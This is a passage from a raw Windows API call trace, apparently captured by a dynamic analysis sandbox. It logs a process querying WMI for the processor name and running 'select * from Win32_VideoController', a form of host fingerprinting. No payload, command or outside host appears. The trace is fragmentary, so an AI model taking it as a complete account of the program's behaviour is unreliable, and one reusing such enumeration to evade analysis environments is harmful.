pVal=0x18a114*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x18a198*=0, plFlavor=0x18a194*=0 | out: pVal=0x18a114*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\YKYD69Q\\root\\cimv2:Win32_Processor.DeviceID=\"CPU0\"", varVal2=0x0), pType=0x18a198*=8, plFlavor=0x18a194*=64) returned 0x0 [0234.114] SysStringByteLen (bstr="\\\\YKYD69Q\\root\\cimv2:Win32_Processor.DeviceID=\"CPU0\"") returned 0x68 [0234.114] SysStringByteLen (bstr="\\\\YKYD69Q\\root\\cimv2:Win32_Processor.DeviceID=\"CPU0\"") returned 0x68 [0234.114] CoGetObjectContext (in: riid=0x27987bc*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18a140 | out: ppv=0x18a140*=0x766114) returned 0x0 [0234.114] IComThreadingInfo:GetCurrentApartmentType (in: This=0x766114, pAptType=0x18a138 | out: pAptType=0x18a138*=1) returned 0x0 [0234.114] IUnknown:QueryInterface (in: This=0x766114, riid=0x27987a4*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x18a13c | out: ppvObject=0x18a13c*=0x0) returned 0x80004002 [0234.114] IUnknown:Release (This=0x766114) returned 0x1 [0234.115] CoGetClassObject (in: rclsid=0x7b5544*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x7490d1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x189aa8 | out: ppv=0x189aa8*=0x5b2d218) returned 0x0 [0234.116] WbemDefPath:IUnknown:QueryInterface (in: This=0x5b2d218, riid=0x74940ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x189cc0 | out: ppvObject=0x189cc0*=0x0) returned 0x80004002 [0234.116] WbemDefPath:IClassFactory:CreateInstance (in: This=0x5b2d218, pUnkOuter=0x0, riid=0x7487e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x189cd4 | out: ppvObject=0x189cd4*=0x5b33178) returned 0x0 [0234.116] WbemDefPath:IUnknown:Release (This=0x5b2d218) returned 0x0 [0234.116] WbemDefPath:IUnknown:QueryInterface (in: This=0x5b33178, riid=0x7487e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1898f4 | out: ppvObject=0x1898f4*=0x5b33178) returned 0x0 [0234.116] WbemDefPath:IUnknown:QueryInterface (in: This=0x5b33178, riid=0x749afc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1898b0 | out: ppvObject=0x1898b0*=0x0) returned 0x80004002 [0234.116] WbemDefPath:IUnknown:AddRef (This=0x5b33178) returned 0x3 [0234.116] WbemDefPath:IUnknown:QueryInterface (in: This=0x5b33178, riid=0x749af90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x18920c | out: ppvObject=0x18920c*=0x0) returned 0x80004002 [0234.116] WbemDefPath:IUnknown:QueryInterface (in: This=0x5b33178, riid=0x749af860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x1891bc | out: ppvObject=0x1891bc*=0x0) returned 0x80004002 [0234.116] WbemDefPath:IUnknown:QueryInterface (in: This=0x5b33178, riid=0x7499c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1891c8 | out: ppvObject=0x1891c8*=0x7e1eb0) returned 0x0 [0234.116] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x7e1eb0, riid=0x7487e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1891d0 | out: pCid=0x1891d0*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0234.116] WbemDefPath:IUnknown:Release (This=0x7e1eb0) returned 0x3 [0234.116] CoGetContextToken (in: pToken=0x189228 | out: pToken=0x189228) returned 0x0 [0234.116] CoGetContextToken (in: pToken=0x189630 | out: pToken=0x189630) returned 0x0 [0234.117] WbemDefPath:IUnknown:QueryInterface (in: This=0x5b33178, riid=0x749afb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1896c0 | out: ppvObject=0x1896c0*=0x0) returned 0x80004002 [0234.117] WbemDefPath:IUnknown:Release (This=0x5b33178) returned 0x2 [0234.117] WbemDefPath:IUnknown:Release (This=0x5b33178) returned 0x1 [0234.117] CoGetContextToken (in: pToken=0x189fb8 | out: pToken=0x189fb8) returned 0x0 [0234.117] CoGetContextToken (in: pToken=0x189f18 | out: pToken=0x189f18) returned 0x0 [0234.117] WbemDefPath:IUnknown:QueryInterface (in: This=0x5b33178, riid=0x189fe8*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x189fe4 | out: ppvObject=0x189fe4*=0x5b33178) returned 0x0 [0234.117] WbemDefPath:IUnknown:AddRef (This=0x5b33178) returned 0x3 [0234.117] WbemDefPath:IUnknown:Release (This=0x5b33178) returned 0x2 [0234.117] WbemDefPath:IWbemPath:SetText (This=0x5b33178, uMode=0x4, pszPath="\\\\YKYD69Q\\root\\cimv2:Win32_Processor.DeviceID=\"CPU0\"") returned 0x0 [0234.117] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5b20820, puCount=0x18a16c | out: puCount=0x18a16c*=0x2) returned 0x0 [0234.117] WbemDefPath:IWbemPath:GetText (in: This=0x5b20820, lFlags=4, puBuffLength=0x18a168*=0x0, pszText=0x0 | out: puBuffLength=0x18a168*=0xf, pszText=0x0) returned 0x0 [0234.117] WbemDefPath:IWbemPath:GetText (in: This=0x5b20820, lFlags=4, puBuffLength=0x18a168*=0xf, pszText="00000000000000" | out: puBuffLength=0x18a168*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0234.117] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5b20820, puCount=0x18a134 | out: puCount=0x18a134*=0x2) returned 0x0 [0234.117] WbemDefPath:IWbemPath:GetText (in: This=0x5b20820, lFlags=4, puBuffLength=0x18a130*=0x0, pszText=0x0 | out: puBuffLength=0x18a130*=0xf, pszText=0x0) returned 0x0 [0234.117] WbemDefPath:IWbemPath:GetText (in: This=0x5b20820, lFlags=4, puBuffLength=0x18a130*=0xf, pszText="00000000000000" | out: puBuffLength=0x18a130*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0234.117] IWbemClassObject:Get (in: This=0x5b333e0, wszName="Name", lFlags=0, pVal=0x18a130*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x27a310c*=0, plFlavor=0x27a3110*=0 | out: pVal=0x18a130*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz", varVal2=0x0), pType=0x27a310c*=8, plFlavor=0x27a3110*=0) returned 0x0 [0234.117] SysStringByteLen (bstr="Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz") returned 0x4e [0234.117] SysStringByteLen (bstr="Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz") returned 0x4e [0234.117] IWbemClassObject:Get (in: This=0x5b333e0, wszName="Name", lFlags=0, pVal=0x18a138*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x27a310c*=8, plFlavor=0x27a3110*=0 | out: pVal=0x18a138*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz", varVal2=0x0), pType=0x27a310c*=8, plFlavor=0x27a3110*=0) returned 0x0 [0234.117] SysStringByteLen (bstr="Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz") returned 0x4e [0234.117] SysStringByteLen (bstr="Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz") returned 0x4e [0234.117] CoGetContextToken (in: pToken=0x18a040 | out: pToken=0x18a040) returned 0x0 [0234.117] WbemLocator:IUnknown:Release (This=0x7a16fc) returned 0x1 [0234.118] IUnknown:Release (This=0x5b333a4) returned 0x0 [0234.135] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5b20820, puCount=0x18a184 | out: puCount=0x18a184*=0x2) returned 0x0 [0234.135] WbemDefPath:IWbemPath:GetText (in: This=0x5b20820, lFlags=4, puBuffLength=0x18a180*=0x0, pszText=0x0 | out: puBuffLength=0x18a180*=0xf, pszText=0x0) returned 0x0 [0234.135] WbemDefPath:IWbemPath:GetText (in: This=0x5b20820, lFlags=4, puBuffLength=0x18a180*=0xf, pszText="00000000000000" | out: puBuffLength=0x18a180*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0234.135] CoGetObjectContext (in: riid=0x27987bc*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18a10c | out: ppv=0x18a10c*=0x766114) returned 0x0 [0234.135] IComThreadingInfo:GetCurrentApartmentType (in: This=0x766114, pAptType=0x18a104 | out: pAptType=0x18a104*=1) returned 0x0 [0234.135] IUnknown:QueryInterface (in: This=0x766114, riid=0x27987a4*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x18a108 | out: ppvObject=0x18a108*=0x0) returned 0x80004002 [0234.135] IUnknown:Release (This=0x766114) returned 0x1 [0234.136] CoGetClassObject (in: rclsid=0x7b5574*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x7490d1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x189d28 | out: ppv=0x189d28*=0x5b35808) returned 0x0 [0234.136] WbemLocator:IUnknown:QueryInterface (in: This=0x5b35808, riid=0x74940ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x189f40 | out: ppvObject=0x189f40*=0x0) returned 0x80004002 [0234.136] WbemLocator:IClassFactory:CreateInstance (in: This=0x5b35808, pUnkOuter=0x0, riid=0x7487e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x189f54 | out: ppvObject=0x189f54*=0x5b331e8) returned 0x0 [0234.136] WbemLocator:IUnknown:Release (This=0x5b35808) returned 0x0 [0234.136] WbemLocator:IUnknown:QueryInterface (in: This=0x5b331e8, riid=0x7487e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x189b74 | out: ppvObject=0x189b74*=0x5b331e8) returned 0x0 [0234.136] WbemLocator:IUnknown:QueryInterface (in: This=0x5b331e8, riid=0x749afc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x189b30 | out: ppvObject=0x189b30*=0x0) returned 0x80004002 [0234.136] WbemLocator:IUnknown:AddRef (This=0x5b331e8) returned 0x3 [0234.136] WbemLocator:IUnknown:QueryInterface (in: This=0x5b331e8, riid=0x749af90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x18948c | out: ppvObject=0x18948c*=0x0) returned 0x80004002 [0234.136] WbemLocator:IUnknown:QueryInterface (in: This=0x5b331e8, riid=0x749af860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x18943c | out: ppvObject=0x18943c*=0x0) returned 0x80004002 [0234.136] WbemLocator:IUnknown:QueryInterface (in: This=0x5b331e8, riid=0x7499c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x189448 | out: ppvObject=0x189448*=0x0) returned 0x80004002 [0234.136] CoGetContextToken (in: pToken=0x1894a8 | out: pToken=0x1894a8) returned 0x0 [0234.136] CoGetContextToken (in: pToken=0x1898b0 | out: pToken=0x1898b0) returned 0x0 [0234.136] WbemLocator:IUnknown:QueryInterface (in: This=0x5b331e8, riid=0x749afb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x189940 | out: ppvObject=0x189940*=0x0) returned 0x80004002 [0234.136] WbemLocator:IUnknown:Release (This=0x5b331e8) returned 0x2 [0234.137] WbemLocator:IUnknown:Release (This=0x5b331e8) returned 0x1 [0234.137] CoGetContextToken (in: pToken=0x189f20 | out: pToken=0x189f20) returned 0x0 [0234.137] CoGetContextToken (in: pToken=0x189e80 | out: pToken=0x189e80) returned 0x0 [0234.137] WbemLocator:IUnknown:QueryInterface (in: This=0x5b331e8, riid=0x189f50*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x189f4c | out: ppvObject=0x189f4c*=0x5b331e8) returned 0x0 [0234.137] WbemLocator:IUnknown:AddRef (This=0x5b331e8) returned 0x3 [0234.137] WbemLocator:IUnknown:Release (This=0x5b331e8) returned 0x2 [0234.137] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5b20820, puCount=0x18a0e8 | out: puCount=0x18a0e8*=0x2) returned 0x0 [0234.137] WbemDefPath:IWbemPath:GetText (in: This=0x5b20820, lFlags=8, puBuffLength=0x18a0e4*=0x0, pszText=0x0 | out: puBuffLength=0x18a0e4*=0xf, pszText=0x0) returned 0x0 [0234.137] WbemDefPath:IWbemPath:GetText (in: This=0x5b20820, lFlags=8, puBuffLength=0x18a0e4*=0xf, pszText="00000000000000" | out: puBuffLength=0x18a0e4*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0234.137] CoCreateInstance (in: rclsid=0x73cf1284*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x73cf12e4*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x189fc0 | out: ppv=0x189fc0*=0x5b33318) returned 0x0 [0234.137] WbemLocator:IWbemLocator:ConnectServer (in: This=0x5b33318, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x18a054 | out: ppNamespace=0x18a054*=0x5b2ff04) returned 0x0 [0234.148] WbemLocator:IUnknown:QueryInterface (in: This=0x5b2ff04, riid=0x73cf1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x189ef0 | out: ppvObject=0x189ef0*=0x7a17cc) returned 0x0 [0234.148] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x7a17cc, pProxy=0x5b2ff04, pAuthnSvc=0x189f40, pAuthzSvc=0x189f3c, pServerPrincName=0x189f34, pAuthnLevel=0x189f38, pImpLevel=0x189f28, pAuthInfo=0x189f2c, pCapabilites=0x189f30 | out: pAuthnSvc=0x189f40*=0xa, pAuthzSvc=0x189f3c*=0x0, pServerPrincName=0x189f34, pAuthnLevel=0x189f38*=0x6, pImpLevel=0x189f28*=0x2, pAuthInfo=0x189f2c, pCapabilites=0x189f30*=0x1) returned 0x0 [0234.148] WbemLocator:IUnknown:Release (This=0x7a17cc) returned 0x1 [0234.148] WbemLocator:IUnknown:QueryInterface (in: This=0x5b2ff04, riid=0x73cf10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x189ee4 | out: ppvObject=0x189ee4*=0x7a17ec) returned 0x0 [0234.148] WbemLocator:IUnknown:QueryInterface (in: This=0x5b2ff04, riid=0x73cf1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x189ee0 | out: ppvObject=0x189ee0*=0x7a17cc) returned 0x0 [0234.148] WbemLocator:IClientSecurity:SetBlanket (This=0x7a17cc, pProxy=0x5b2ff04, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0234.148] WbemLocator:IUnknown:Release (This=0x7a17cc) returned 0x2 [0234.148] WbemLocator:IUnknown:Release (This=0x7a17ec) returned 0x1 [0234.148] CoTaskMemFree (pv=0x7b5748) [0234.148] WbemLocator:IUnknown:Release (This=0x5b33318) returned 0x0 [0234.149] WbemLocator:IUnknown:QueryInterface (in: This=0x5b2ff04, riid=0x7487e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x189ae0 | out: ppvObject=0x189ae0*=0x7a17ec) returned 0x0 [0234.149] WbemLocator:IUnknown:QueryInterface (in: This=0x7a17ec, riid=0x749afc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x189a9c | out: ppvObject=0x189a9c*=0x0) returned 0x80004002 [0234.149] WbemLocator:IUnknown:QueryInterface (in: This=0x7a17ec, riid=0x749afe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1898bc | out: ppvObject=0x1898bc*=0x0) returned 0x80004002 [0234.149] WbemLocator:IUnknown:AddRef (This=0x7a17ec) returned 0x3 [0234.149] WbemLocator:IUnknown:QueryInterface (in: This=0x7a17ec, riid=0x749af90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x1893fc | out: ppvObject=0x1893fc*=0x0) returned 0x80004002 [0234.150] WbemLocator:IUnknown:QueryInterface (in: This=0x7a17ec, riid=0x749af860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x1893ac | out: ppvObject=0x1893ac*=0x0) returned 0x80004002 [0234.150] WbemLocator:IUnknown:QueryInterface (in: This=0x7a17ec, riid=0x7499c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1893b8 | out: ppvObject=0x1893b8*=0x7a174c) returned 0x0 [0234.150] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x7a174c, riid=0x7487e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1893c0 | out: pCid=0x1893c0*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0234.150] WbemLocator:IUnknown:Release (This=0x7a174c) returned 0x3 [0234.150] CoGetContextToken (in: pToken=0x189418 | out: pToken=0x189418) returned 0x0 [0234.150] CoGetContextToken (in: pToken=0x189820 | out: pToken=0x189820) returned 0x0 [0234.150] WbemLocator:IUnknown:QueryInterface (in: This=0x7a17ec, riid=0x749afb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1898b0 | out: ppvObject=0x1898b0*=0x7a17d4) returned 0x0 [0234.150] WbemLocator:IRpcOptions:Query (in: This=0x7a17d4, pPrx=0x7a17ec, dwProperty=2, pdwValue=0x1898d8 | out: pdwValue=0x1898d8) returned 0x80004002 [0234.150] WbemLocator:IUnknown:Release (This=0x7a17d4) returned 0x3 [0234.150] WbemLocator:IUnknown:Release (This=0x7a17ec) returned 0x2 [0234.150] CoGetContextToken (in: pToken=0x189df0 | out: pToken=0x189df0) returned 0x0 [0234.150] CoGetContextToken (in: pToken=0x189d50 | out: pToken=0x189d50) returned 0x0 [0234.150] WbemLocator:IUnknown:QueryInterface (in: This=0x7a17ec, riid=0x189e20*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x189e1c | out: ppvObject=0x189e1c*=0x5b2ff04) returned 0x0 [0234.150] WbemLocator:IUnknown:AddRef (This=0x5b2ff04) returned 0x4 [0234.150] WbemLocator:IUnknown:Release (This=0x5b2ff04) returned 0x3 [0234.150] WbemLocator:IUnknown:Release (This=0x5b2ff04) returned 0x2 [0234.151] SysStringLen (param_1=0x0) returned 0x0 [0234.151] CoGetContextToken (in: pToken=0x189de8 | out: pToken=0x189de8) returned 0x0 [0234.151] WbemLocator:IUnknown:AddRef (This=0x7a17ec) returned 0x3 [0234.151] WbemLocator:IUnknown:QueryInterface (in: This=0x7a17ec, riid=0x7487e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x189c7c | out: ppvObject=0x189c7c*=0x7a17ec) returned 0x0 [0234.151] WbemLocator:IUnknown:Release (This=0x7a17ec) returned 0x3 [0234.151] WbemLocator:IUnknown:Release (This=0x7a17ec) returned 0x2 [0234.151] CoGetContextToken (in: pToken=0x189ed8 | out: pToken=0x189ed8) returned 0x0 [0234.151] WbemLocator:IUnknown:AddRef (This=0x5b2ff04) returned 0x3 [0234.151] IWbemServices:ExecQuery (in: This=0x5b2ff04, strQueryLanguage="WQL", strQuery="select * from Win32_VideoController", lFlags=16, pCtx=0x0, ppEnum=0x18a0f0 | out: ppEnum=0x18a0f0*=0x5b333a4) returned 0x0 [0234.156] IUnknown:QueryInterface (in: This=0x5b333a4, riid=0x73cf1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x189f48 | out: ppvObject=0x189f48*=0x5b333a8) returned 0x0 [0234.156] IClientSecurity:QueryBlanket (in: This=0x5b333a8, pProxy=0x5b333a4, pAuthnSvc=0x189f98, pAuthzSvc=0x189f94, pServerPrincName=0x189f8c, pAuthnLevel=0x189f90, pImpLevel=0x189f80, pAuthInfo=0x189f84, pCapabilites=0x189f88 | out: pAuthnSvc=0x189f98*=0xa, pAuthzSvc=0x189f94*=0x0, pServerPrincName=0x189f8c, pAuthnLevel=0x189f90*=0x6, pImpLevel=0x189f80*=0x2, pAuthInfo=0x189f84, pCapabilites=0x189f88*=0x1) returned 0x0 [0234.156] IUnknown:Release (This=0x5b333a8) returned 0x1 [0234.156] IUnknown:QueryInterface (in: This=0x5b333a4, riid=0x73cf10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x189f3c | out: ppvObject=0x189f3c*=0x7a16fc) returned 0x0 [0234.156] IUnknown:QueryInterface (in: This=0x5b333a4, riid=0x73cf1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x189f38 | out: ppvObject=0x189f38*=0x5b333a8) returned 0x0 [0234.156] IClientSecurity:SetBlanket (This=0x5b333a8, pProxy=0x5b333a4, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0234.165] IUnknown:Release (This=0x5b333a8) returned 0x2 [0234.165] WbemLocator:IUnknown:Release (This=0x7a16fc) returned 0x1 [0234.165] CoTaskMemFree (pv=0x7b57a8) [0234.165] IUnknown:QueryInterface (in: This=0x5b333a4, riid=0x7487e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x189b34 | out: ppvObject=0x189b34*=0x7a16fc) returned 0x0 [0234.165] WbemLocator:IUnknown:QueryInterface (in: This=0x7a16fc, riid=0x749afc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x189af0 | out: ppvObject=0x189af0*=0x0) returned 0x80004002 [0234.166] WbemLocator:IUnknown:QueryInterface (in: This=0x7a16fc, riid=0x749afe90*(Data1=0xb196b283, Data2=0xbab4, 